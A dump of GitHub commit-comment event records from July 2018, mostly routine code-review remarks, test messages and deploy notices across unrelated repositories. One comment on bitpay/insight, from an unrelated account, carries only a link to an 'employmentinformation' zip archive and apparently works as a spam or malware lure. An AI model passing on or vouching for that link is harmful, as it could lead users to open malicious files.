{"id":"7910147147","type":"CommitCommentEvent","actor":{"login":"hoangtungfly"},"repo":{"name":"hoangtungfly/csjc"},"payload":{"comment":{"id":29574934,"position":null,"line":null,"path":null,"commit_id":"f21d54bc6a63a1491d3230437564c9b32e7fb627","created_at":"2018-07-03T04:10:21Z","updated_at":"2018-07-03T04:10:21Z","author_association":"OWNER","body":"chỉnh sửa lại hàm search"}},"created_at":"2018-07-03T04:10:21Z"}
{"id":"7910151949","type":"CommitCommentEvent","actor":{"login":"dlhandsome"},"repo":{"name":"dlhandsome/wepy"},"payload":{"comment":{"id":29574944,"position":5,"line":3,"path":"packages/wepy-cli/test/core/fixtures/template/assert/v-if.wxml","commit_id":"5393850596a63725dd1f6eeae2e1fa90367cb9ab","created_at":"2018-07-03T04:12:29Z","updated_at":"2018-07-03T04:12:29Z","author_association":"OWNER","body":"理想编译：```<view wx:else></view>```"}},"created_at":"2018-07-03T04:12:29Z"}
{"id":"7910152579","type":"CommitCommentEvent","actor":{"login":"naveenshetty"},"repo":{"name":"naveenshetty/Integration-test"},"payload":{"comment":{"id":29574946,"position":null,"line":null,"path":null,"commit_id":"ad4d1bc3ef7c9c96061d25d50dcecb81ba89bc1f","created_at":"2018-07-03T04:12:46Z","updated_at":"2018-07-03T04:12:46Z","author_association":"OWNER","body":"deleted "}},"created_at":"2018-07-03T04:12:46Z"}
{"id":"7910156841","type":"CommitCommentEvent","actor":{"login":"CelesteComet"},"repo":{"name":"codeforsanjose/upfront-info"},"payload":{"comment":{"id":29574959,"position":null,"line":null,"path":null,"commit_id":"22e86462f5a42df30c99e96c1694800cd984ecec","created_at":"2018-07-03T04:14:32Z","updated_at":"2018-07-03T04:14:32Z","author_association":"COLLABORATOR","body":"I'll fix it and add better commit messages. I'm so sorry \r\n"}},"created_at":"2018-07-03T04:14:32Z"}
{"id":"7910161548","type":"CommitCommentEvent","actor":{"login":"Chrysostomus"},"repo":{"name":"Chrysostomus/manjaro-architect"},"payload":{"comment":{"id":29574968,"position":null,"line":null,"path":null,"commit_id":"3117d31410ffa16a0ef169f6e97cb3547f2bf3ca","created_at":"2018-07-03T04:16:29Z","updated_at":"2018-07-03T04:16:29Z","author_association":"OWNER","body":"True, thanks. I was in a bit of a hurry yesterday "}},"created_at":"2018-07-03T04:16:29Z"}
{"id":"7910166521","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"dora-js/anyproxy"},"payload":{"comment":{"id":29574973,"position":null,"line":null,"path":null,"commit_id":"338fc38a4be05e8087ea997b83ff6dd13cc1b058","created_at":"2018-07-03T04:18:45Z","updated_at":"2018-07-03T04:18:45Z","author_association":"MEMBER","body":"@sorrycc 需要发个版本"}},"created_at":"2018-07-03T04:18:45Z"}
{"id":"7910166616","type":"CommitCommentEvent","actor":{"login":"Magenta-hm"},"repo":{"name":"Magenta-hm/labmedia-test"},"payload":{"comment":{"id":29574974,"position":null,"line":null,"path":null,"commit_id":"696b7bd5bd6f6626aad2d7960cead461270d4373","created_at":"2018-07-03T04:18:49Z","updated_at":"2018-07-03T04:18:49Z","author_association":"OWNER","body":"Ссылка на просмотр страницы https://magenta-hm.github.io/labmedia-test/"}},"created_at":"2018-07-03T04:18:49Z"}
{"id":"7910166807","type":"CommitCommentEvent","actor":{"login":"ideal"},"repo":{"name":"qt/qtbase"},"payload":{"comment":{"id":29574975,"position":null,"line":null,"path":null,"commit_id":"62abbe34b84a1c224d27f3eb2f735749f5f24b4f","created_at":"2018-07-03T04:18:54Z","updated_at":"2018-07-03T04:18:54Z","author_association":"NONE","body":"Is `unsigned(7)` needed?"}},"created_at":"2018-07-03T04:18:54Z"}
{"id":"7910167787","type":"CommitCommentEvent","actor":{"login":"robthr"},"repo":{"name":"robthr/tbapi"},"payload":{"comment":{"id":29574978,"position":null,"line":null,"path":null,"commit_id":"da53a0b3b3c7cc612c7d713d852e89bcebe68474","created_at":"2018-07-03T04:19:19Z","updated_at":"2018-07-03T04:19:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Expire express-session cookies](https://trello.com/c/60seAxCg/4-expire-express-session-cookies)"}},"created_at":"2018-07-03T04:19:19Z"}
{"id":"7910171091","type":"CommitCommentEvent","actor":{"login":"evanwill"},"repo":{"name":"uidaholib/main-web-redesign_draft"},"payload":{"comment":{"id":29574983,"position":null,"line":null,"path":null,"commit_id":"fbe653ffdf0f92ed398ff83e3422a98ae79f5f62","created_at":"2018-07-03T04:20:40Z","updated_at":"2018-07-03T04:20:40Z","author_association":"MEMBER","body":"oh my :open_mouth: ! this is just right, nice work."}},"created_at":"2018-07-03T04:20:40Z"}
{"id":"7910190145","type":"CommitCommentEvent","actor":{"login":"zasm1954"},"repo":{"name":"zasmtech/TutorialCPE_EE"},"payload":{"comment":{"id":29575013,"position":null,"line":null,"path":null,"commit_id":"8d35c2e803589343b07bced4a0bfbc92bddebd33","created_at":"2018-07-03T04:29:05Z","updated_at":"2018-07-03T04:29:05Z","author_association":"COLLABORATOR","body":"revert"}},"created_at":"2018-07-03T04:29:05Z"}
{"id":"7910190176","type":"CommitCommentEvent","actor":{"login":"Akianonymus"},"repo":{"name":"Oreo-Harpia/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":29575014,"position":null,"line":null,"path":null,"commit_id":"7bf99f7d2e91dabb26a3d4b6ede10a9a626d02a0","created_at":"2018-07-03T04:29:06Z","updated_at":"2018-07-03T04:29:06Z","author_association":"NONE","body":"msm8916 cannot use GRALLOC1 \r\nsee here\r\nhttps://github.com/LineageOS/android_device_cyanogen_msm8916-common/commit/2a7a70d00404b2b646e746d9f08c4df772d1b71b"}},"created_at":"2018-07-03T04:29:06Z"}
{"id":"7910190610","type":"CommitCommentEvent","actor":{"login":"adamgreen"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29575016,"position":80,"line":1710,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.cpp","commit_id":"7fc41f6923bbeff6da944f54669237e9327d1fd1","created_at":"2018-07-03T04:29:16Z","updated_at":"2018-07-03T04:29:16Z","author_association":"NONE","body":"Looks like a tab snuck in here."}},"created_at":"2018-07-03T04:29:16Z"}
{"id":"7910201446","type":"CommitCommentEvent","actor":{"login":"sathishkumar93"},"repo":{"name":"sarumathi1894/saru"},"payload":{"comment":{"id":29575031,"position":98,"line":98,"path":"A.py","commit_id":"256c6d11a604540bdcbf566c5489e510c9c000e0","created_at":"2018-07-03T04:34:05Z","updated_at":"2018-07-03T04:34:05Z","author_association":"COLLABORATOR","body":"please optimize the code"}},"created_at":"2018-07-03T04:34:05Z"}
{"id":"7910202097","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29575033,"position":5,"line":null,"path":"app/src/at-thachnguyen/res/layout/activity_menu.xml","commit_id":"488dd12bd121d80c280d1bdc6e7b553d23f7cd8d","created_at":"2018-07-03T04:34:22Z","updated_at":"2018-07-03T04:34:22Z","author_association":"NONE","body":"WARNING: [ExtraText] Unexpected text found in layout file: \"android:textStyle=\"bold\" />\"\n Layout resource files should only contain elements and attributes. Any XML text content found \\\nin the file is likely accidental (and potentially dangerous if the text resembles XML and the \\\ndeveloper believes the text to be functional)"}},"created_at":"2018-07-03T04:34:22Z"}
{"id":"7910204023","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29575036,"position":null,"line":null,"path":null,"commit_id":"de3daacd3abf2c6c6a131e705aa23af0297d83dd","created_at":"2018-07-03T04:35:15Z","updated_at":"2018-07-03T04:35:15Z","author_association":"NONE","body":"Well eine!"}},"created_at":"2018-07-03T04:35:15Z"}
{"id":"7910206812","type":"CommitCommentEvent","actor":{"login":"oscarjjs"},"repo":{"name":"oscarjjs/hello-world"},"payload":{"comment":{"id":29575039,"position":4,"line":4,"path":"README.md","commit_id":"9c1e0190b011bcd208ca5ba0e6bc7452553e6acb","created_at":"2018-07-03T04:36:34Z","updated_at":"2018-07-03T04:36:34Z","author_association":"OWNER","body":"3ra adicion"}},"created_at":"2018-07-03T04:36:34Z"}
{"id":"7910207297","type":"CommitCommentEvent","actor":{"login":"Monicasexy"},"repo":{"name":"bitpay/insight"},"payload":{"comment":{"id":29575040,"position":1,"line":1,"path":".jscsrc","commit_id":"3b2e65e5ade13d2862be0a2b4e1a9e6d2c8e0a4d","created_at":"2018-07-03T04:36:46Z","updated_at":"2018-07-03T04:36:46Z","author_association":"NONE","body":"[employmentinformation (1) (2) (2).zip](https://github.com/bitpay/insight/files/2157652/employmentinformation.1.2.2.zip)\r\n"}},"created_at":"2018-07-03T04:36:46Z"}
{"id":"7910208202","type":"CommitCommentEvent","actor":{"login":"oscarjjs"},"repo":{"name":"oscarjjs/hello-world"},"payload":{"comment":{"id":29575042,"position":null,"line":null,"path":null,"commit_id":"9c1e0190b011bcd208ca5ba0e6bc7452553e6acb","created_at":"2018-07-03T04:37:11Z","updated_at":"2018-07-03T04:37:11Z","author_association":"OWNER","body":"comentario de la 3ra adicion"}},"created_at":"2018-07-03T04:37:11Z"}
{"id":"7910214871","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29575053,"position":null,"line":null,"path":null,"commit_id":"de3daacd3abf2c6c6a131e705aa23af0297d83dd","created_at":"2018-07-03T04:40:12Z","updated_at":"2018-07-03T04:40:12Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-03T04:40:12Z"}
{"id":"7910228272","type":"CommitCommentEvent","actor":{"login":"Tiogaplanet"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29575066,"position":80,"line":1710,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.cpp","commit_id":"7fc41f6923bbeff6da944f54669237e9327d1fd1","created_at":"2018-07-03T04:46:12Z","updated_at":"2018-07-03T04:46:12Z","author_association":"OWNER","body":"I don't see it.  Which line number?  I just got to work but I'll clean it up when I'm home again."}},"created_at":"2018-07-03T04:46:12Z"}
{"id":"7910230782","type":"CommitCommentEvent","actor":{"login":"dimakashtan"},"repo":{"name":"pallets/flask"},"payload":{"comment":{"id":29575072,"position":null,"line":null,"path":null,"commit_id":"4536e76e5eadf1844306b532a8414adfad96b624","created_at":"2018-07-03T04:47:25Z","updated_at":"2018-07-03T04:47:25Z","author_association":"NONE","body":"Спасибо"}},"created_at":"2018-07-03T04:47:25Z"}
{"id":"7910231259","type":"CommitCommentEvent","actor":{"login":"adamgreen"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29575073,"position":29,"line":1659,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.cpp","commit_id":"7fc41f6923bbeff6da944f54669237e9327d1fd1","created_at":"2018-07-03T04:47:38Z","updated_at":"2018-07-03T04:47:38Z","author_association":"NONE","body":"According to the WowWee documentation this tracking mode is the same as the radar mode and default mode is the same as gesture mode. If so these are already supported by the API."}},"created_at":"2018-07-03T04:47:38Z"}
{"id":"7910232350","type":"CommitCommentEvent","actor":{"login":"Rikk"},"repo":{"name":"landley/toybox"},"payload":{"comment":{"id":29575077,"position":null,"line":null,"path":null,"commit_id":"d376344bfd834c73347b8e523231438969b7220f","created_at":"2018-07-03T04:48:06Z","updated_at":"2018-07-03T04:48:06Z","author_association":"NONE","body":"(Reposting because I don't know if Github send edits by email)\r\n\r\nI think it doesn't... \"Created\" time feels more a concept from Microsoft Windows... Some says the equivalent in Unix is the Birth Time (btime or crtime), but I don't know how to display it.\r\nI see Change value (ctime) changing much more frequently than the others; every time a file receives an action, ie. when it's metadata on the filesystem changes, this value is updated; for example, if you use 'touch', rename, copy, move, change permissions, etc. of the file, the value of ctime is set to the current time. Even more, ctime can't be defined arbitrarily using 'touch'. Modified time (mtime) indicates file contents change. Access time (atime) means the file was read in some way.\r\n\r\nEdit: some links/tips...\r\nhttps://unix.stackexchange.com/questions/50177/birth-is-empty-on-ext4/50184\r\nhttps://github.com/planetlabs/crtime/blob/master/crtime.c\r\nhttp://man7.org/linux/man-pages/man2/statx.2.html"}},"created_at":"2018-07-03T04:48:06Z"}
{"id":"7910233821","type":"CommitCommentEvent","actor":{"login":"adamgreen"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29575080,"position":26,"line":491,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.h","commit_id":"7fc41f6923bbeff6da944f54669237e9327d1fd1","created_at":"2018-07-03T04:48:45Z","updated_at":"2018-07-03T04:48:45Z","author_association":"NONE","body":"Tab here too."}},"created_at":"2018-07-03T04:48:45Z"}
{"id":"7910233988","type":"CommitCommentEvent","actor":{"login":"JABECA"},"repo":{"name":"JABECA/webPage"},"payload":{"comment":{"id":29575081,"position":null,"line":null,"path":null,"commit_id":"726302aba8d7ee97daefa116fd1396caf823a66d","created_at":"2018-07-03T04:48:50Z","updated_at":"2018-07-03T04:48:50Z","author_association":"OWNER","body":"Menos mal te diste cuenta"}},"created_at":"2018-07-03T04:48:50Z"}
{"id":"7910236578","type":"CommitCommentEvent","actor":{"login":"parthvshah"},"repo":{"name":"aniketnk/alcoding-data-analysis"},"payload":{"comment":{"id":29575084,"position":null,"line":null,"path":null,"commit_id":"d6c357d115eefc6c580ee8f939badb988f0412cb","created_at":"2018-07-03T04:49:59Z","updated_at":"2018-07-03T04:49:59Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Homepage](https://trello.com/c/GLxfKqXD/49-homepage)"}},"created_at":"2018-07-03T04:49:59Z"}
{"id":"7910238906","type":"CommitCommentEvent","actor":{"login":"Gabriel439"},"repo":{"name":"dhall-lang/dhall-nix"},"payload":{"comment":{"id":29575088,"position":7,"line":33,"path":"dhall-nix.cabal","commit_id":"4c7e66bb6a39eaf9c2b888cb51a30965a88d7c75","created_at":"2018-07-03T04:51:00Z","updated_at":"2018-07-03T04:51:00Z","author_association":"COLLABORATOR","body":"Do you still need `dhall-nix` to support older versions after that change?"}},"created_at":"2018-07-03T04:51:00Z"}
{"id":"7910246618","type":"CommitCommentEvent","actor":{"login":"waterwater98"},"repo":{"name":"Jack-Cherish/python-spider"},"payload":{"comment":{"id":29575099,"position":null,"line":null,"path":null,"commit_id":"54c9d32c88f065bb26edc5b10ef3baa3a1694303","created_at":"2018-07-03T04:54:25Z","updated_at":"2018-07-03T04:54:25Z","author_association":"NONE","body":"请问一直出现KeyError: 'user_list' 该怎么处理呢？"}},"created_at":"2018-07-03T04:54:25Z"}
{"id":"7910255332","type":"CommitCommentEvent","actor":{"login":"devenbansod"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":29575106,"position":7,"line":6,"path":"js/src/classes/Console/PMA_consoleDebug.js","commit_id":"73d6fd98ec058f6b9dc0dda6c68437318e20ef26","created_at":"2018-07-03T04:58:16Z","updated_at":"2018-07-03T04:58:16Z","author_association":"MEMBER","body":"Why not export simply as `Messages`?"}},"created_at":"2018-07-03T04:58:16Z"}
{"id":"7910256191","type":"CommitCommentEvent","actor":{"login":"Nathan813"},"repo":{"name":"Quantisan/docker-clojure"},"payload":{"comment":{"id":29575113,"position":16,"line":43,"path":"update.sh","commit_id":"b70e619ffb51af690df4e69672012607a8209f3f","created_at":"2018-07-03T04:58:40Z","updated_at":"2018-07-03T04:58:40Z","author_association":"NONE","body":"- step:\r\n    # set HEROKU_API_KEY and HEROKU_APP_NAME environment variables\r\n    # set clone `depth: full' as described here: https://confluence.atlassian.com/x/Y9-5Mw\r\n    name: Deploy to Heroku\r\n    deployment: test   # set to test, staging or production\r\n    # trigger: manual  # uncomment to have a manual step\r\n    script:\r\n      - git push https://heroku:$HEROKU_API_KEY@git.heroku.com/$HEROKU_APP_NAME.git HEAD\r\n"}},"created_at":"2018-07-03T04:58:40Z"}
{"id":"7910256328","type":"CommitCommentEvent","actor":{"login":"devenbansod"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":29575114,"position":4,"line":4,"path":"js/src/classes/Chart.js","commit_id":"73d6fd98ec058f6b9dc0dda6c68437318e20ef26","created_at":"2018-07-03T04:58:44Z","updated_at":"2018-07-03T04:58:44Z","author_association":"MEMBER","body":"Is normal import not working? Why is this absolute path needed?"}},"created_at":"2018-07-03T04:58:44Z"}
{"id":"7910256440","type":"CommitCommentEvent","actor":{"login":"tongtong1993"},"repo":{"name":"high-speed-downloader/high-speed-downloader"},"payload":{"comment":{"id":29575115,"position":null,"line":null,"path":null,"commit_id":"b1890ae92e98a312ad491de990b5717303b7a727","created_at":"2018-07-03T04:58:47Z","updated_at":"2018-07-03T04:58:47Z","author_association":"NONE","body":"”高速受限，重新注册账号“\r\n请问要如何解决这问题？"}},"created_at":"2018-07-03T04:58:47Z"}
{"id":"7910259879","type":"CommitCommentEvent","actor":{"login":"wangsen1989"},"repo":{"name":"wangsen1989/blog"},"payload":{"comment":{"id":29575123,"position":null,"line":null,"path":null,"commit_id":"e55a2134f1cf5204924b49e462eba239c62b1e1b","created_at":"2018-07-03T05:00:15Z","updated_at":"2018-07-03T05:00:15Z","author_association":"OWNER","body":"# ww\r\n# yy"}},"created_at":"2018-07-03T05:00:15Z"}
{"id":"7910260184","type":"CommitCommentEvent","actor":{"login":"Chitradip-Capitalnumbers"},"repo":{"name":"Masterworks/Clarity-Components"},"payload":{"comment":{"id":29575130,"position":null,"line":null,"path":null,"commit_id":"d1552771d0c15ee55ff2eeba7202b9625fc1354f","created_at":"2018-07-03T05:00:20Z","updated_at":"2018-07-03T05:00:20Z","author_association":"COLLABORATOR","body":"@danielgolden I will do that."}},"created_at":"2018-07-03T05:00:20Z"}
{"id":"7910260365","type":"CommitCommentEvent","actor":{"login":"wangsen1989"},"repo":{"name":"wangsen1989/blog"},"payload":{"comment":{"id":29575131,"position":null,"line":null,"path":null,"commit_id":"e55a2134f1cf5204924b49e462eba239c62b1e1b","created_at":"2018-07-03T05:00:24Z","updated_at":"2018-07-03T05:00:24Z","author_association":"OWNER","body":"ww\r\nyy"}},"created_at":"2018-07-03T05:00:24Z"}
{"id":"7910260797","type":"CommitCommentEvent","actor":{"login":"wangsen1989"},"repo":{"name":"wangsen1989/blog"},"payload":{"comment":{"id":29575133,"position":null,"line":null,"path":null,"commit_id":"e55a2134f1cf5204924b49e462eba239c62b1e1b","created_at":"2018-07-03T05:00:33Z","updated_at":"2018-07-03T05:00:33Z","author_association":"OWNER","body":"\\w"}},"created_at":"2018-07-03T05:00:33Z"}
{"id":"7910266317","type":"CommitCommentEvent","actor":{"login":"wangsen1989"},"repo":{"name":"wangsen1989/blog"},"payload":{"comment":{"id":29575145,"position":null,"line":null,"path":null,"commit_id":"e55a2134f1cf5204924b49e462eba239c62b1e1b","created_at":"2018-07-03T05:02:47Z","updated_at":"2018-07-03T05:02:47Z","author_association":"OWNER","body":"*w\r\n*e"}},"created_at":"2018-07-03T05:02:47Z"}
{"id":"7910266449","type":"CommitCommentEvent","actor":{"login":"RyanFlemming"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29575146,"position":5,"line":26,"path":"Vidly/Models/IdentityModels.cs","commit_id":"e7fb4e6973bbcf640780e44e18f3c12344460138","created_at":"2018-07-03T05:02:50Z","updated_at":"2018-07-03T05:02:50Z","author_association":"NONE","body":"@ramonventoso is correct. For example, If you added properties to movie or customer.cs, you'd get a \"the model backing [context name] has changed..\" error when debugging. You'd then create a migration and save the changes. But since we're not changing the backing model, this isn't required. "}},"created_at":"2018-07-03T05:02:50Z"}
{"id":"7910266606","type":"CommitCommentEvent","actor":{"login":"wangsen1989"},"repo":{"name":"wangsen1989/blog"},"payload":{"comment":{"id":29575148,"position":null,"line":null,"path":null,"commit_id":"e55a2134f1cf5204924b49e462eba239c62b1e1b","created_at":"2018-07-03T05:02:54Z","updated_at":"2018-07-03T05:02:54Z","author_association":"OWNER","body":"* w"}},"created_at":"2018-07-03T05:02:54Z"}
{"id":"7910269302","type":"CommitCommentEvent","actor":{"login":"SaidChoquehuanca"},"repo":{"name":"davidalejandrolazopampa/Mundial"},"payload":{"comment":{"id":29575157,"position":2,"line":1,"path":"CRUD","commit_id":"7b006da3239d858dbddcee491f8e01af0ac2a773","created_at":"2018-07-03T05:04:03Z","updated_at":"2018-07-03T05:04:03Z","author_association":"COLLABORATOR","body":"say=\"Hellowtha\"\r\n✌️ "}},"created_at":"2018-07-03T05:04:03Z"}
{"id":"7910277014","type":"CommitCommentEvent","actor":{"login":"ariesduanmu"},"repo":{"name":"Ludisposed/Steganography"},"payload":{"comment":{"id":29575181,"position":null,"line":null,"path":null,"commit_id":"f68e782f82d7de6198e2f67951645ed69d6a7010","created_at":"2018-07-03T05:07:02Z","updated_at":"2018-07-03T05:07:02Z","author_association":"COLLABORATOR","body":"haha it did have indent problem from my view"}},"created_at":"2018-07-03T05:07:02Z"}
{"id":"7910278337","type":"CommitCommentEvent","actor":{"login":"turkertopal"},"repo":{"name":"xenerizes/models"},"payload":{"comment":{"id":29575182,"position":null,"line":null,"path":null,"commit_id":"4dfb5debc7c0831f2d4de6b23721033c244b0d2c","created_at":"2018-07-03T05:07:36Z","updated_at":"2018-07-03T05:07:36Z","author_association":"NONE","body":"Hi Yuliya, your code is the only thing in internet where it is possible to have an idea about how to integrate Arima into kapacitor udf. \r\nIf you could add some more comments on read me about how you are configuring kapacitor.config it would be so very much appreciated.  "}},"created_at":"2018-07-03T05:07:36Z"}
{"id":"7910283352","type":"CommitCommentEvent","actor":{"login":"Gcaufy"},"repo":{"name":"Tencent/wepy"},"payload":{"comment":{"id":29575195,"position":45,"line":242,"path":"packages/wepy/src/component.js","commit_id":"b5b7f7fa66f5d195d7422ae902e0bd2bd817e47c","created_at":"2018-07-03T05:09:43Z","updated_at":"2018-07-03T05:09:43Z","author_association":"COLLABORATOR","body":"的确，这里移除了 com.$apply 导致了组件的onload中处理的数据并没有渲染至视图上。@cuijiemmx"}},"created_at":"2018-07-03T05:09:43Z"}
{"id":"7910284917","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29575196,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-03T05:10:25Z","updated_at":"2018-07-03T05:10:25Z","author_association":"OWNER","body":"Weird that performance is affected that much by just requiring a higher GL version.\r\nAnyway I was wrong about the requirements:\r\nThe log2 Z scaling require GLES 3 (or full desktop OpenGL)\r\nFlat shading requires GL 3.x / GLES 3.x.\r\nOIT needs OpenGL 4.3.\r\nBump mapping doesn't require anything special by itself but is normally used with flat shading."}},"created_at":"2018-07-03T05:10:25Z"}
{"id":"7910299583","type":"CommitCommentEvent","actor":{"login":"fishprotect"},"repo":{"name":"fishprotect/learngit2"},"payload":{"comment":{"id":29575219,"position":null,"line":null,"path":null,"commit_id":"575654fec2aed26eb7b08b4af7df5e0903d4de05","created_at":"2018-07-03T05:16:30Z","updated_at":"2018-07-03T05:16:30Z","author_association":"OWNER","body":"ddd"}},"created_at":"2018-07-03T05:16:30Z"}
{"id":"7910305746","type":"CommitCommentEvent","actor":{"login":"ronakmehta1"},"repo":{"name":"ronakmehta1/test4"},"payload":{"comment":{"id":29575228,"position":null,"line":null,"path":null,"commit_id":"58f4abee63a32ef6857b1f7ce364a503793230ec","created_at":"2018-07-03T05:18:56Z","updated_at":"2018-07-03T05:18:56Z","author_association":"OWNER","body":"new demo file created"}},"created_at":"2018-07-03T05:18:56Z"}
{"id":"7910329287","type":"CommitCommentEvent","actor":{"login":"mmdnetwork"},"repo":{"name":"mmdnetwork/test.mmdnetwork.com"},"payload":{"comment":{"id":29575258,"position":null,"line":null,"path":null,"commit_id":"f1b78765856e5ba94be779aaa8dffc59581e464a","created_at":"2018-07-03T05:28:25Z","updated_at":"2018-07-03T05:28:25Z","author_association":"OWNER","body":"Added a footer widget.  Also added a \"Follow Us\" widget on the right sidebar."}},"created_at":"2018-07-03T05:28:25Z"}
{"id":"7910329482","type":"CommitCommentEvent","actor":{"login":"gssdinem"},"repo":{"name":"gssdinem/Test"},"payload":{"comment":{"id":29575259,"position":null,"line":null,"path":null,"commit_id":"f6be641653be4a2a42efda39195969b76e31ad63","created_at":"2018-07-03T05:28:30Z","updated_at":"2018-07-03T05:28:30Z","author_association":"OWNER","body":"TEST"}},"created_at":"2018-07-03T05:28:30Z"}
{"id":"7910329531","type":"CommitCommentEvent","actor":{"login":"idsb3t1"},"repo":{"name":"idsb3t1/UI-ys1int-KEEP-TC"},"payload":{"comment":{"id":29575260,"position":null,"line":null,"path":null,"commit_id":"35bc748fd69775a9ac9d3fb49c9306cee93dbec8","created_at":"2018-07-03T05:28:31Z","updated_at":"2018-07-03T05:28:31Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.stage1.bluemix.net/devops/toolchains/ee7af0c7-eb4b-4808-84ae-65a1ebf892f4?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\"): [Delivery Pipeline](https://console.stage1.bluemix.net/devops/pipelines/9602ba9a-db4c-42c8-81d1-69655e515efe?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\") deployed [UI-ys1int-KEEP-TC](https://github.com/idsb3t1/UI-ys1int-KEEP-TC/releases/tag/deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180703-052830 \"deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180703-052830\") to [dev](https://console.stage1.bluemix.net/apps/e0173942-fbb5-42df-a8ff-cca49f037241?env_id=ibm:ys1:us-south \"ibm:ys1:us-south:idsb3t2@us.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-03T05:28:31Z"}
{"id":"7910330487","type":"CommitCommentEvent","actor":{"login":"mmdnetwork"},"repo":{"name":"mmdnetwork/test.mmdnetwork.com"},"payload":{"comment":{"id":29575262,"position":null,"line":null,"path":null,"commit_id":"f1b78765856e5ba94be779aaa8dffc59581e464a","created_at":"2018-07-03T05:28:52Z","updated_at":"2018-07-03T05:28:52Z","author_association":"OWNER","body":"Also changed my profile name from mmdnetwork to MMD Network."}},"created_at":"2018-07-03T05:28:52Z"}
{"id":"7910334022","type":"CommitCommentEvent","actor":{"login":"sahu2201"},"repo":{"name":"sahu2201/Autobots"},"payload":{"comment":{"id":29575270,"position":null,"line":null,"path":null,"commit_id":"ce0b204dce3ae67ea4638f39a831720c12ceadec","created_at":"2018-07-03T05:30:14Z","updated_at":"2018-07-03T05:30:14Z","author_association":"OWNER","body":"Oye Update kiya tune abhi?"}},"created_at":"2018-07-03T05:30:14Z"}
{"id":"7910334555","type":"CommitCommentEvent","actor":{"login":"calebsander"},"repo":{"name":"ASCIT/donut"},"payload":{"comment":{"id":29575273,"position":20,"line":54,"path":"donut/modules/flights/helpers.py","commit_id":"63138ba8910d60628b2242e0fd4f824f8a53cbae","created_at":"2018-07-03T05:30:24Z","updated_at":"2018-07-03T05:30:24Z","author_association":"MEMBER","body":"Executing a bunch of calls to a database is much slower than processing the data from a single query in Python, since it involves networking and interacting with the disk. You already have all the information you need from the query, so it should be possible to build `grouped_flights` in Python."}},"created_at":"2018-07-03T05:30:24Z"}
{"id":"7910334655","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29575274,"position":14,"line":14,"path":"pom.xml","commit_id":"dd5c208d7cb9e7bd0ef4b2de258ecfb3692edaf6","created_at":"2018-07-03T05:30:27Z","updated_at":"2018-07-03T05:30:27Z","author_association":"COLLABORATOR","body":"Spring Boot Project - нельзя)\r\nЕсли уж мы делаем приложение, которое собираемся конфигурить ручками, то давай придерживаться этого плана!"}},"created_at":"2018-07-03T05:30:27Z"}
{"id":"7910336591","type":"CommitCommentEvent","actor":{"login":"achillean"},"repo":{"name":"achillean/shodan-python"},"payload":{"comment":{"id":29575278,"position":null,"line":null,"path":null,"commit_id":"88ec367e852eda0739611a59c95a15503b6ed951","created_at":"2018-07-03T05:31:09Z","updated_at":"2018-07-03T05:31:09Z","author_association":"OWNER","body":"Yes, the connection wouldn't timeout if the connection isn't reset from the other end (ex. server closes connection). I don't think this is a common situation but I agree that it would be cleaner to structure the code so the heartbeat and timeout can be separately controlled - I'm just not sure how to do it nicely.\r\n\r\nI do believe that if the user sets a timeout <= 0 then they would always want to have heartbeat enabled whereas setting a timeout would usually imply setting heartbeat to False.\r\n\r\nA simple fix might be to change the current code so if the user sets a timeout of 0 then internally we would enable heartbeat and set a timeout of 5 so if for whatever reason heartbeat messages don't show up then the connection will timeout and we can attempt to reconnect."}},"created_at":"2018-07-03T05:31:09Z"}
{"id":"7910338509","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29575283,"position":7,"line":7,"path":"src/main/java/com/agurova/SummerPracticeProject/dal/contracts/IImageRepo.java","commit_id":"dd5c208d7cb9e7bd0ef4b2de258ecfb3692edaf6","created_at":"2018-07-03T05:31:53Z","updated_at":"2018-07-03T05:31:53Z","author_association":"COLLABORATOR","body":"IImageRepo code-style from .NET in Java, hmmm?"}},"created_at":"2018-07-03T05:31:53Z"}
